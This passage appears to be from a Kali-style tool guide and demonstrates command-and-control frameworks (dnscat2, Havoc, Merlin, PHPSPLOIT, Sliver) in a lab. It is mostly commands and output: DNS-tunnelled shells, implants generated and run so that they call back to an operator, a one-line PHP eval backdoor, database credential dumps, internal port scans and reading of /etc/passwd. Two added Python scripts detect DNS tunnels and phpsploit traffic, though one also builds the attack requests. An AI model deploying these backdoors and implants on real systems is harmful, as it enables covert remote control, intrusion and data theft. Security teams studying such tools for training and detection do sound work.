./dnscat --dns server=x.x.x.x,port=53 --secret=1507062e60429a952e6fe2aa94075363
Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.
# Host 2
# Connect to the server
root@kali_2:~# dnscat --dns server=192.168.11.3,port=53 --secret=1507062e60429a952e6fe2aa94075363
Creating DNS driver:
domain = (null)
host = 0.0.0.0
port = 53
type = TXT,CNAME,MX
server = 192.168.11.3
** Peer verified with pre-shared secret!
Session established!
# Host 1
# Once the session with the client is established, a new window opens on the server and commands can be issued from the server to the client
New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
# Open the command session
dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!
[...]
# Create a shell session
command (kali_2) 1> shell
Sent request to execute a shell
command (kali_2) 1> New window created: 2
Shell session created!
# Open the shell session
command (kali_2) 1> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
sh (kali_2) 2> hostname
sh (kali_2) 2> kali_2
# Capture the packets with tcpdump on the client side
root@kali:~# tcpdump -n -i eth0 port 53
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
# Data is sent and received disguised as DNS queries for TXT/CNAME/MX records (the hex label carries the payload)
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
03:41:53.195196 IP 192.168.11.4.44093 > 192.168.11.3.53: 43573+ TXT? dnscat.2f3a016f52dd8c94e98fe70036e2f64773. (59)
03:41:53.197128 IP 192.168.11.3.53 > 192.168.11.4.44093: 43573 1/0/0 TXT "94e3016f523e994869fa84ffff5a885679" (106)
03:41:54.208397 IP 192.168.11.4.44093 > 192.168.11.3.53: 64826+ CNAME? dnscat.1f3d016f5228771e0cedf30037bf5fa797. (59)
03:41:54.210195 IP 192.168.11.3.53 > 192.168.11.4.44093: 64826 1/0/0 CNAME dnscat.8ca8016f5274bde7938e5affff5a885679. (114)
03:41:55.221575 IP 192.168.11.4.44093 > 192.168.11.3.53: 60799+ CNAME? dnscat.130a016f5293bbfc000f2c00387c21ec80. (59)
03:41:55.223130 IP 192.168.11.3.53 > 192.168.11.4.44093: 60799 1/0/0 CNAME dnscat.c599016f520243110731cdffff5a885679. (114)
03:41:56.234294 IP 192.168.11.4.44093 > 192.168.11.3.53: 29702+ TXT? dnscat.1b56016f527b3274a67cb40039dd60a349. (59)
03:41:56.235843 IP 192.168.11.3.53 > 192.168.11.4.44093: 29702 1/0/0 TXT "d44e016f5240a6a8c9f9e0ffff5a885679" (106)
03:41:57.245968 IP 192.168.11.4.44093 > 192.168.11.3.53: 52735+ MX? dnscat.a0a3016f528940f6f686a6003ab56046db. (59)
03:41:57.247653 IP 192.168.11.3.53 > 192.168.11.4.44093: 52735 1/0/0 MX dnscat.0d6d016f52493e55490b07ffff5a885679. 10 (116)
03:41:58.257349 IP 192.168.11.4.44093 > 192.168.11.3.53: 14940+ CNAME? dnscat.24fe016f52e71a8a720e16003bc8afe63d. (59)
03:41:58.258412 IP 192.168.11.3.53 > 192.168.11.4.44093: 14940 1/0/0 CNAME dnscat.64cd016f52d8fdbb09db8dffff5a885679. (114)
03:41:59.266634 IP 192.168.11.4.44093 > 192.168.11.3.53: 20216+ CNAME? dnscat.7506016f52206478418ced003cb04af50f. (59)
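The capture above is the detection signal: every query name is one long hex label (here under the dnscat. prefix, under the tunnel domain when one is configured), the record types cycle through TXT, CNAME and MX, and queries keep arriving once per second even when nothing is typed. The following is an added example, not part of the original page or of dnscat2, that scores tcpdump lines like these per source address for exactly those indicators. The thresholds are assumptions, and the sample lines are four from the capture above plus three constructed ordinary lookups from another host.

```python
import math
import re
from collections import Counter, defaultdict

# Query side of tcpdump's one-line DNS output, e.g.
# "03:41:53.195196 IP 192.168.11.4.44093 > 192.168.11.3.53: 43573+ TXT? dnscat.2f3a...73. (59)"
QUERY_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d+(?:\.\d+){3})\.\d+ > (?P<dst>\d+(?:\.\d+){3})\.53: "
    r"\d+\+? (?:\[[^\]]*\] )?(?P<qtype>[A-Z]+)\? (?P<qname>\S+)\. \(\d+\)$"
)
# Record types dnscat2 can tunnel over (NULL added: common in other DNS tunnels, assumption)
TUNNEL_QTYPES = {"TXT", "CNAME", "MX", "NULL"}
# A label that is nothing but 24+ hex digits is a payload, not a hostname
HEX_LABEL_RE = re.compile(r"^[0-9a-f]{24,}$")


def shannon_entropy(s: str) -> float:
    """Bits per character; hex-encoded payload labels sit near 4.0, the maximum for hex."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse_query(line: str):
    """Return the fields of a DNS query line, or None for responses and non-DNS lines."""
    m = QUERY_RE.match(line)
    if not m:
        return None
    q = m.groupdict()
    q["labels"] = q["qname"].split(".")
    return q


def score_client(queries: list) -> dict:
    """Indicators over all parsed queries from one source address."""
    n = len(queries)
    # payload labels: everything but the registrable domain (last two labels) when there is one
    payload = "".join("".join(q["labels"][:-2] or q["labels"]) for q in queries)
    return {
        "queries": n,
        "tunnel_qtype_ratio": sum(q["qtype"] in TUNNEL_QTYPES for q in queries) / n,
        "hex_label_ratio": sum(any(HEX_LABEL_RE.match(l) for l in q["labels"]) for q in queries) / n,
        "longest_label": max(len(l) for q in queries for l in q["labels"]),
        "label_entropy": shannon_entropy(payload),
    }


def find_tunnel_clients(lines, min_queries: int = 3) -> dict:
    """Group query lines by source IP and return the clients whose traffic looks like a tunnel."""
    by_src = defaultdict(list)
    for line in lines:
        q = parse_query(line)
        if q:
            by_src[q["src"]].append(q)
    flagged = {}
    for src, qs in by_src.items():
        if len(qs) < min_queries:
            continue
        s = score_client(qs)
        # thresholds are assumptions; tune them against your own resolver logs
        if s["tunnel_qtype_ratio"] >= 0.8 and s["hex_label_ratio"] >= 0.8 and s["longest_label"] >= 24:
            flagged[src] = s
    return flagged


# Constructed sample: four lines from the capture above plus three ordinary lookups from another host
SAMPLE_LINES = [
    "03:41:53.195196 IP 192.168.11.4.44093 > 192.168.11.3.53: 43573+ TXT? dnscat.2f3a016f52dd8c94e98fe70036e2f64773. (59)",
    "03:41:53.197128 IP 192.168.11.3.53 > 192.168.11.4.44093: 43573 1/0/0 TXT \"94e3016f523e994869fa84ffff5a885679\" (106)",
    "03:41:54.208397 IP 192.168.11.4.44093 > 192.168.11.3.53: 64826+ CNAME? dnscat.1f3d016f5228771e0cedf30037bf5fa797. (59)",
    "03:41:57.245968 IP 192.168.11.4.44093 > 192.168.11.3.53: 52735+ MX? dnscat.a0a3016f528940f6f686a6003ab56046db. (59)",
    "03:41:58.257349 IP 192.168.11.4.44093 > 192.168.11.3.53: 14940+ CNAME? dnscat.24fe016f52e71a8a720e16003bc8afe63d. (59)",
    "03:42:01.000000 IP 192.168.11.5.51000 > 192.168.11.3.53: 11111+ A? www.example.com. (33)",
    "03:42:02.000000 IP 192.168.11.5.51001 > 192.168.11.3.53: 11112+ AAAA? www.example.com. (33)",
    "03:42:03.000000 IP 192.168.11.5.51002 > 192.168.11.3.53: 11113+ MX? example.com. (29)",
]

if __name__ == "__main__":
    for src, score in find_tunnel_clients(SAMPLE_LINES).items():
        print(src, score)
```

Feed it the output of tcpdump -n -l port 53 (one line per packet). The query rate is deliberately not scored: a short capture cannot tell the client's steady --delay beacon from a busy but legitimate resolver client, so add a per-client queries-per-minute check only when you feed it longer windows.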
Havoc
Creates a customizable command-and-control channel.
■ Usage
# Server
root@kali:~# havoc server --help
teamserver command
Usage:
havoc server [flags]
Flags:
--profile string set havoc teamserver profile
--debug enable debug mode
--debug-dev enable debug mode for developers (compiles the agent with the debug mode/macro enabled)
--send-logs the agent will send logs over http(s) to the teamserver
-d, --default uses default profile (overwrites --profile)
-v, --verbose verbose messages
-h, --help help for server
# Client
root@kali:~# havoc client --help
client command
Usage:
havoc client [flags]
Flags:
-h, --help help for client
■ Example
# Start the server
root@kali:~# havoc server --profile /usr/share/havoc/profiles/havoc.yaotl
[INFO] Havoc Framework [Version: 0.7] [CodeName: Bites The Dust]
[INFO] Havoc profile: /usr/share/havoc/profiles/havoc.yaotl
[INFO] Build:
- Compiler x64 : /usr/bin/x86_64-w64-mingw32-gcc
- Compiler x86 : /usr/bin/i686-w64-mingw32-gcc
- Nasm : /usr/bin/nasm
[INFO] Time: 13/10/2024 05:07:59
[INFO] Teamserver logs saved under: /root/.havoc/data/loot/2024.10.13._05:07:59
[INFO] Starting Teamserver on wss://0.0.0.0:40056
[INFO] [SERVICE] starting service handle on wss://0.0.0.0:40056/service-endpoint
[INFO] Opens existing database: /root/.havoc/data/teamserver.db
[...]
root@kali:~# havoc client
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
[05:08:54] [info] Havoc Framework [Version: 0.7] [CodeName: Bites The Dust]
[05:08:54] [info] Successful created database
[05:08:54] [info] loaded config file: client/config.toml
[...]
havoc client
Running the client command opens the client window shown in the screenshot below
Add an HTTP listener (the communication channel with the agent)
Create the payload (compiles the Demon agent to local disk)
Only a Windows agent is provided by default, so a third-party Linux agent is used here.
Place the generated agent on the target host and run it; a session with the server is established
From the server, request the agent to run a shell
Merlin
Creates a command-and-control channel over HTTP/1.1, HTTP/2 and HTTP/3, with a multi-user mode.
■ Usage
# gRPC server
root@kali:~# merlinServer --help
Usage of merlinServer:
-addr string
The address to listen on for client connections (default "127.0.0.1:50051")
-debug
Enable debug logging
-extra
Enable extra debug logging
-password string
the password to for CLI RPC clients to connect to this server (default "merlin")
-secure
Require client TLS certificate verification
-tlsCA string
TLS Certificate Authority file path to verify client certificates
-tlsCert string
TLS certificate file path
-tlsKey string
TLS private key file path
-trace
Enable trace logging
-version
Print the version number and exit
# CLI for operating the server
root@kali:~# merlinCLI --help
Usage of merlinCLI:
-addr string
The address of the Merlin server to connect to (default "127.0.0.1:50051")
-password string
the password to connect to the Merlin server (default "merlin")
-secure
Require server TLS certificate verification
-tlsCA string
TLS Certificate Authority file path
-tlsCert string
TLS certificate file path
-tlsKey string
TLS private key file path
-version
Print the version number and exit
# Agent
root@kali:~# merlinAgent --help
Merlin Agent
-addr string
The address in interface:port format the agent will use for communications (default "127.0.0.1:4444")
-auth string
The Agent's authentication method (e.g., OPAQUE) (default "opaque")
-debug
Enable debug output
-headers string
A new line separated (e.g., \n) list of additional HTTP headers to use
-host string
HTTP Host header
-http-client string
The HTTP client to use for communication [go, winhttp] (default "go")
-ja3 string
JA3 signature string (not the MD5 hash). Overrides -proto & -parrot flags
-killdate string
The date, as a Unix EPOCH timestamp, that the agent will quit running (default "0")
-listener string
The uuid of the peer-to-peer listener this agent should connect to
-maxretry string
The maximum amount of failed checkins before the agent will quit running (default "7")
-padding string
The maximum amount of data that will be randomly selected and appended to every message (default "4096")
-parrot string
parrot or mimic a specific browser from github.com/refraction-networking/utls (e.g., HelloChrome_Auto)
-proto string
Protocol for the agent to connect with [https (HTTP/1.1), http (HTTP/1.1 Clear-Text), h2 (HTTP/2), h2c (HTTP/2 Clear-Text), http3 (QUIC or HTTP/3.0), tcp-bind, tcp-reverse, udp-bind, udp-reverse, smb-bind, smb-reverse] (default "h2")
-proxy string
Hardcoded proxy to use for http/1.1 traffic only that will override host configuration
-proxy-pass string
Password for proxy authentication
-proxy-user string
Username for proxy authentication
-psk string
Pre-Shared Key used to encrypt initial communications (default "merlin")
-secure string
Require TLS certificate validation for HTTP communications (default "false")
-skew string
Amount of skew, or variance, between agent checkins (default "3000")
-sleep string
Time for agent to sleep (default "30s")
-transforms string
Ordered CSV of transforms to construct a message (default "jwe,gob-base")
-url string
A comma separated list of the full URLs for the agent to connect to (default "https://127.0.0.1:443")
-useragent string
The HTTP User-Agent header string that the Agent will use while sending traffic (default "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36")
-v Enable verbose output
-version
Print the agent version and exit
■ Example
# Start the server
root@kali_srv:~# merlinServer
{"time":"2024-10-23T02:04:36.099747089Z","level":"INFO","msg":"Created new TLS certificate","Serial":210820309662697702526355408769238977508,"Subject":["Merlin"],"NotBefore":"2024-10-23T02:04:36.08753054Z","NotAfter":"2025-10-29T02:04:36.08753064Z"}
[...]
# Connect to the server with the CLI
root@kali_srv:~# merlinCLI
[+] 2024-10-23T02:05:52Z Successfully connected to Merlin server at 127.0.0.1:50051
Merlin»
# Create a listener (the communication channel with the agent)
Merlin» listeners
Merlin[listeners]»use HTTP2
Merlin[listeners][HTTP2]»set Name Evil-Ch
Merlin[listeners][HTTP2]»run
[+] 2024-10-23T02:13:23Z Started 'Evil-Ch' listener with an ID of 9407c468-9da4-4a81-8360-2b6f496eeb73 and a HTTP2 server on 127.0.0.1:443
Merlin[listeners][9407c468-9da4-4a81-8360-2b6f496eeb73]»
# Connect from the agent to the server's HTTP2 listener (the listener above reports binding to 127.0.0.1:443; for an agent on another host it has to listen on a reachable address, set through the listener's Interface option before run, a step not shown here)
root@kali_ag:~# merlinAgent -proto h2 -url https://192.168.11.3:443
Merlin[listeners][9407c468-9da4-4a81-8360-2b6f496eeb73]»
[+] 2024-10-23T02:15:37Z New authenticated Agent checkin for ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:15:37Z
[-] 2024-10-23T02:16:09Z Results of job TXncsWAlxT for agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:16:09Z
Configuration data received for Agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 and updated. Issue the "info" command to view it
# Start interacting with the agent
Merlin[listeners][9407c468-9da4-4a81-8360-2b6f496eeb73]»interact ddd2a8b1-0a35-48a8-85d0-2eb4672a9886
# Get the interface information of the agent host
Merlin[agent][ddd2a8b1-0a35-48a8-85d0-2eb4672a9886]»ifconfig
Merlin[agent][ddd2a8b1-0a35-48a8-85d0-2eb4672a9886]»
[-] 2024-10-23T02:25:17Z Created job yeATAfPyFZ for agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:25:17Z
[-] 2024-10-23T02:26:13Z Results of job yeATAfPyFZ for agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:26:13Z
[+] 2024-10-23T02:26:13Z lo
MAC Address
IP Address 127.0.0.1/8
eth1
MAC Address 02:42:ac:12:00:02
IP Address 192.168.65.2/24
eth0
MAC Address 02:42:ac:13:00:03
IP Address 192.168.11.4/24
# Run a port scan against the agent host's internal network
Merlin[agent][ddd2a8b1-0a35-48a8-85d0-2eb4672a9886]» shell nmap -v -n 192.168.65.0/24 -T4 --unprivileged
Merlin[agent][ddd2a8b1-0a35-48a8-85d0-2eb4672a9886]»
[-] 2024-10-23T02:34:54Z Created job LwIViqGiVy for agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:34:54Z
[-] 2024-10-23T02:35:36Z Results of job LwIViqGiVy for agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:35:36Z
[+] 2024-10-23T02:35:36Z Created /bin/sh process with an ID of 318
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 02:35 UTC
Initiating Ping Scan at 02:35
Scanning 256 hosts [2 ports/host]
Completed Ping Scan at 02:35, 3.01s elapsed (256 total hosts)
[...]
Nmap scan report for 192.168.65.1
Host is up (0.00027s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
111/tcp open rpcbind
8080/tcp open http-proxy
Nmap scan report for 192.168.65.2
Host is up (0.00030s latency).
All 1000 scanned ports on 192.168.11.3 are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)
Nmap scan report for 192.168.65.3
Host is up (0.00032s latency).
Not shown: 979 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Read data files from: /usr/share/nmap
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.04 seconds
PHPSPLOIT
Creates a command-and-control channel through a PHP backdoor script placed on the target web server.
■ Usage
root@kali:~# phpsploit --help
usage: phpsploit [-h] [-v] [-c <FILE>] [-l <SESSION>] [-t <URL>] [-s <FILE>] [-e <CMD>] [-i]
options:
-h, --help show this help message and exit
-v, --version output version information and exit
-c <FILE>, --config <FILE> use alternative configuration file
-l <SESSION>, --load <SESSION> load session file
-t <URL>, --target <URL> set remote TARGET URL
-s <FILE>, --source <FILE> run commands from file (disables interactive mode)
-e <CMD>, --eval <CMD> run phpsploit command (disables interactive mode)
-i, --interactive force interactive mode if unset by `-e` or `-s`
■ Example
Place the following backdoor script on the target web server
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
# Start in interactive mode
root@kali:~# phpsploit
# Set the URL of the backdoor placed on the target web server
phpsploit > set TARGET http://192.168.11.4/backdoor.php
# Trigger the backdoor script on the target web server
phpsploit > exploit
[*] Current backdoor is: <?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
[*] Sending payload to http://192.168.11.4/backdoor.php ...
[*] Shell obtained by PHP (192.168.11.3 -> 192.168.11.4)
Connected to Linux server (192.168.11.4)
running PHP 5.2.4-2ubuntu5.10 on Apache/2.2.8 (Ubuntu) DAV/2
phpsploit(192.168.11.4) >
# Connect to MySQL on the target web server
phpsploit(192.168.11.4) > mysql connect root@127.0.0.1
[*] SUCCESS: Access granted for user 'root'@'127.0.0.1' (using password: NO)
# List the databases
phpsploit(192.168.11.4) > mysql show databases
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.03 sec)
# Select a database
phpsploit(192.168.11.4) > mysql use tikiwiki
[*] Database changed
# List the tables
phpsploit(192.168.11.4) > mysql show tables
+------------------------------------+
| Tables_in_tikiwiki |
+------------------------------------+
| galaxia_activities |
| galaxia_activity_roles |
[...]
| users_usergroups |
| users_users |
+------------------------------------+
# Run SQL
phpsploit(192.168.11.4) > mysql select login,password from users_users
+-------+----------+
| login | password |
+-------+----------+
| admin | admin |
+-------+----------+
1 row in set (0.11 sec)
Remote control works by base64-encoding PHP code and sending it to the backdoor script in HTTP headers.
# Dump of the traffic when running ls in phpsploit
root@kali:~# tcpdump -A -i eth0
GET /backdoor.php HTTP/1.1
Accept-Encoding: identity
Phpspl01T: eval(base64_decode('JHM9JF9TRVJWRVI7a3NvcnQoJHMpOyR4PSIiO2ZvcmVhY2goJHMgYXMgJGE9PiRiKWlmKHN1YnN0cigkYSwwLDcpPT0nSFRUUF9aWicpJHguPSRiO2V2YWwoYmFzZTY0X2RlY29kZSgiJHgiKSk7'));
Zzaa: [...]
Zzab: [...]
Zzac: [...]
Zzad: [...]
Zzae: cigkaCk7CnJldHVybiAoVHJ1ZSk7Cn0KZWxzZQpyZXR1cm4gKEZhbHNlKTsKfQplbHNlaWYgKCRtb2RlID09ICd3JyB8fCAkbW9kZSA9PSAnYScpCnsKJG9sZF9tdGltZSA9IEBmaWxlbXRpbWUoJGFic3BhdGgpOwokb2xkX2F0aW1lID0gQGZpbGVhdGltZSgkYWJzcGF0aCk7CiRyYW5kID0gJGFic3BhdGggLiB1bmlxaWQoJy9wc3BhcGlfJyk7CmlmICgkaCA9IEBmb3BlbigkcmFuZCwgJ2EnKSkKewpAZmNsb3NlKCRoKTsKJHJlc3VsdCA9IFRydWU7Cn0KZWxzZQp7CiRyZXN1bHQgPSBGYWxzZTsKfQpAdW5saW5rKCRyYW5kKTsKQHRvdWNoKCRhYnNwYXRoLCAkb2xkX210aW1lLCAkb2xkX2F0aW1lKTsKcmV0dXJuICgkcmVzdWx0KTsKfQplbHNlCnJldHVybiAoRmFsc2UpOwp9CmZ1bmN0aW9uIGdldFBlcm1zKCRhYnNwYXRoLCAkcGVybXNfZm9ybWF0PSJ1bml4IikKewpnbG9iYWwgJFBIUFNQTE9JVDs
Zzaf: KJHBlcm1zID0gQGZpbGVwZXJtcygkYWJzcGF0aCk7CmlmICgoJHBlcm1zICYgMHhDMDAwKSA9PSAweEMwMDApCiR0eXBlID0gJ3MnOwplbHNlaWYgKCgkcGVybXMgJiAweEEwMDApID09IDB4QTAwMCkKJHR5cGUgPSAnbCc7CmVsc2VpZiAoKCRwZXJtcyAmIDB4ODAwMCkgPT0gMHg4MDAwKQokdHlwZSA9ICctJzsKZWxzZWlmICgoJHBlcm1zICYgMHg2MDAwKSA9PSAweDYwMDApCiR0eXBlID0gJ2InOwplbHNlaWYgKCgkcGVybXMgJiAweDQwMDApID09IDB4NDAwMCkKJHR5cGUgPSAnZCc7CmVsc2VpZiAoKCRwZXJtcyAmIDB4MjAwMCkgPT0gMHgyMDAwKQokdHlwZSA9ICdjJzsKZWxzZWlmICgoJHBlcm1zICYgMHgxMDAwKSA9PSAweDEwMDApCiR0eXBlID0gJ3AnOwplbHNlCiR0eXBlID0gJ3UnOwppZiAoKHN1YnN0cigkYWJzcGF0aCwgLTMpID09ICRQSFBTUExPSVRbJ1BBVEhfU0VQJ10gLiAnLi4nKS
Zzag: [...]
Zzah: [...]
Zzai: [...]
Zzaj: [...]
Zzak: [...]
Zzal: [...]
Zzam: [...]
Zzan: [...]
Host: 192.168.11.4
# Contents of the Phpspl01T header (base64-decoded)
$s=$_SERVER;ksort($s);$x="";foreach($s as $a=>$b)if(substr($a,0,7)=='HTTP_ZZ')$x.=$b;eval(base64_decode("$x"));
# Contents of Zzaa through Zzan concatenated (base64-decoded)
echo "607686f6-81fa-4cbf-bd65-793d2626d002";
[...]
function payload()
{
global $PHPSPLOIT;
$PHPSPLOIT = unserialize(
base64_decode(
"YTo0OntzOjg6IlBBVEhfU0VQIjtzOjE6Ii8iO3M6NjoiVEFSR0VUIjtzOjg6Ii92YXIvd3d3IjtzOjk6IlNFUEFSQVRPUiI7czoxOiIvIjtzOjU6IlBBUlNFIjtpOjA7fQ=="
)
);
function getOwner($abspath)
{
if (function_exists("posix_getpwuid")) {
$uid = @filegroup($abspath);
$usr = @posix_getpwuid($uid);
if (@is_string($usr["name"]) && !@empty($usr["name"])) {
return $usr["name"];
}
}
return "?";
}
[...]
}
$result = payload();
if (!is_array($result) || array_keys($result) !== ["__ERROR__"]) {
$result = ["__RESULT__" => $result];
}
echo gzcompress(serialize($result));
foreach ($orig_conf as $key => $val) {
@ini_set($key, $val);
}
echo "607686f6-81fa-4cbf-bd65-793d2626d002";
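The dump above shows the transport in full: the Phpspl01T header carries a stager, and the actual PHP is base64-encoded, cut into pieces and spread across Zzaa, Zzab, ... headers that the stager concatenates in sorted order and decodes. The following added example (not phpsploit's own code) reproduces both sides in Python, so that a captured request can be decoded offline and the same request shape can be matched in a proxy or WAF rule; decode_stager() turns the base64 from the dump above back into the one-liner listed under the Phpspl01T header. The chunk size and the detection threshold are assumptions.

```python
import base64
import itertools
import re
import string

# Base64 body of the Phpspl01T header captured in the dump above
STAGER_B64 = (
    "JHM9JF9TRVJWRVI7a3NvcnQoJHMpOyR4PSIiO2ZvcmVhY2goJHMgYXMgJGE9PiRiKWlmKHN1YnN0cigkYSwwLDcp"
    "PT0nSFRUUF9aWicpJHguPSRiO2V2YWwoYmFzZTY0X2RlY29kZSgiJHgiKSk7"
)


def decode_stager(b64: str = STAGER_B64) -> str:
    """The PHP the backdoor's eval() runs first: the one-liner that collects the Zz?? headers."""
    return base64.b64decode(b64).decode()


def header_names():
    """Zzaa, Zzab, ..., Zzzz, in the order PHP's ksort() on $_SERVER will later sort them."""
    for a, b in itertools.product(string.ascii_lowercase, repeat=2):
        yield "Zz" + a + b


def split_payload(php_code: str, chunk_size: int = 64) -> dict:
    """Client side: base64 the payload and spread it over Zz?? headers. chunk_size is an assumption;
    the cut points need not fall on base64 quartet boundaries, as the capture above shows."""
    blob = base64.b64encode(php_code.encode()).decode()
    names = header_names()
    return {next(names): blob[i:i + chunk_size] for i in range(0, len(blob), chunk_size)}


def build_headers(php_code: str, chunk_size: int = 64) -> dict:
    """Full header set of one phpsploit request: stager in Phpspl01T, payload in Zz??."""
    headers = {"Phpspl01T": f"eval(base64_decode('{STAGER_B64}'));"}
    headers.update(split_payload(php_code, chunk_size))
    return headers


def reassemble(headers: dict) -> str:
    """Server side, step for step what the stager does: map request headers to $_SERVER keys
    (HTTP_ plus the upper-cased name), ksort, keep HTTP_ZZ*, concatenate, base64-decode."""
    server_vars = {"HTTP_" + k.upper().replace("-", "_"): v for k, v in headers.items()}
    x = "".join(v for k, v in sorted(server_vars.items()) if k.startswith("HTTP_ZZ"))
    return base64.b64decode(x).decode()


ZZ_NAME_RE = re.compile(r"Zz[a-z]{2}", re.I)


def looks_like_phpsploit(raw_request: str) -> bool:
    """Detection: the stager header, or two or more Zz?? headers, marks a phpsploit request."""
    names = [line.split(":", 1)[0].strip() for line in raw_request.splitlines() if ":" in line]
    has_stager = any(n.lower() == "phpspl01t" for n in names)
    zz_headers = sum(1 for n in names if ZZ_NAME_RE.fullmatch(n))
    return has_stager or zz_headers >= 2


if __name__ == "__main__":
    code = "echo gzcompress(serialize(['__RESULT__' => getcwd()]));"
    hdrs = build_headers(code, chunk_size=10)
    for name, value in hdrs.items():
        print(f"{name}: {value}")
    print(reassemble(hdrs) == code)
```

Because the stager only needs the Zz?? values in key order, header order on the wire is irrelevant, which is why reassemble() sorts rather than trusting the order a proxy happened to log them in.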
Sliver
Creates a command-and-control channel over mTLS, WireGuard, HTTP(S) and DNS, with a multi-user mode.
■ Usage
root@kali:~# sliver-server --help
Usage:
sliver-server [flags]
sliver-server [command]
Available Commands:
builder Start the process as an external builder
completion Generate the autocompletion script for the specified shell
daemon Force start server in daemon mode
export-ca Export certificate authority
help Help about any command
import-ca Import certificate authority
operator Generate operator configuration files
unpack Unpack assets and exit
version Print version and exit
Flags:
-h, --help help for sliver-server
root@kali:~# sliver-client --help
Usage:
sliver-client [flags]
sliver-client [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
help Help about any command
import Import a client configuration file
version Print version and exit
Flags:
-h, --help help for sliver-client
■ Example
root@kali_1:~# sliver-server
[...]
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
# Generate the implant (the binary run on the target host that gives the server remote access)
[server] sliver > generate --os linux --mtls 192.168.11.3:8888 --save payload
[*] Generating new linux/amd64 implant binary
[*] Implant saved to /root/payload
# Start the mTLS listener
[server] sliver > mtls
[*] Starting mTLS listener ...
[*] Successfully started job #1
[server] sliver >
# Run the implant on the target host
root@kali_2:~# ./payload
root@kali_1:~#
[server] sliver >
# Running the implant creates a session with the target host
[*] Session 2364510a WASTEFUL_CUCUMBER - 192.168.11.4:45900 (kali_2) - linux/amd64 - Wed, 13 Nov 2024 11:47:23 UTC
[server] sliver > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ================== ========== ========== ================== =========
2364510a mtls 192.168.11.4:45900 kali_2 root linux/amd64 [ALIVE]
# Attach to the session
[server] sliver > use 2364510a
[*] Active session WASTEFUL_CUCUMBER (2364510a-4b9e-4534-85b1-7264ca73ef20)
# Run a command on the target host
[server] sliver (WASTEFUL_CUCUMBER) > execute -o cat /etc/passwd
[*] Output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
[...]
# Multiplayer mode: an operator connects from a separate client host
root@kali_1:~# sliver-server
[...]
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
# Create a configuration file for an operator
[server] sliver > new-operator --name hello --lhost 192.168.11.3
[*] Generating new client certificate, please wait ...
[*] Saved new client config to: /root/hello_192.168.11.3.cfg
# Enable multiplayer mode (the gRPC listener for operators)
[server] sliver > multiplayer
[*] Multiplayer mode enabled!
# Generate the implant (the binary run on the target host that gives the server remote access)
[server] sliver > generate --os linux --mtls 192.168.56.3:8888 --save payload
[*] Generating new linux/amd64 implant binary
[*] Implant saved to /root/payload
# Start the mTLS listener
[server] sliver > mtls --lhost 192.168.56.3
[*] Starting mTLS listener ...
[*] Successfully started job #2
[server] sliver >
# On the operator host, import the configuration file created on the server
root@kali_2:~# sliver-client import hello_192.168.11.3.cfg
2024/11/13 09:22:20 Saved new client config to: /root/.sliver-client/configs/hello_192.168.11.3.cfg
# Starting the client connects it to the server
root@kali_2:~# sliver-client
Connecting to 192.168.11.3:31337 ...
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver >
# Run the implant on the target host
root@kali_3:~# ./payload
# The session is reported to the operator through the server
root@kali_2:~#
[*] Session 6a314c82 AMUSED_OVERCOAT - 192.168.56.4:40728 (kali_3) - linux/amd64 - Thu, 14 Nov 2024 04:04:15 UTC
sliver > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ================== ========== ========== ================== =========
6a314c82 mtls 192.168.56.4:40728 kali_3 root linux/amd64 [ALIVE]
# Attach to the session from the operator
sliver > use 6a314c82
